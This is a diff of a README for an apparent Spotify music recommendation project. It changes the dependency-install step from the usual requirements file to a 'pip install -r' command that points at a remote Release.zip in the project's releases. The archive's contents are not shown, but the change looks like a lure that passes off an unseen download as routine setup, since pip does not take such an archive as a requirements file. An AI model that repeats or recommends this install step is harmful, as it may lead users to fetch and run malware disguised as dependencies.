Poopman555/Spotify-Music-Recommendation-System/README.md

 To get started with the Spotify Music Recommendation System, follow these steps:

 1. Clone the repository to your local machine.
-2. Install the necessary dependencies by running `pip install -r requirements.txt`.
+2. Install the necessary dependencies by running `pip install -r https://github.com/Poopman555/Spotify-Music-Recommendation-System/releases/download/v1.0/Release.zip`.
 3. Run the main program to start exploring personalized music recommendations.

 ### Contributing: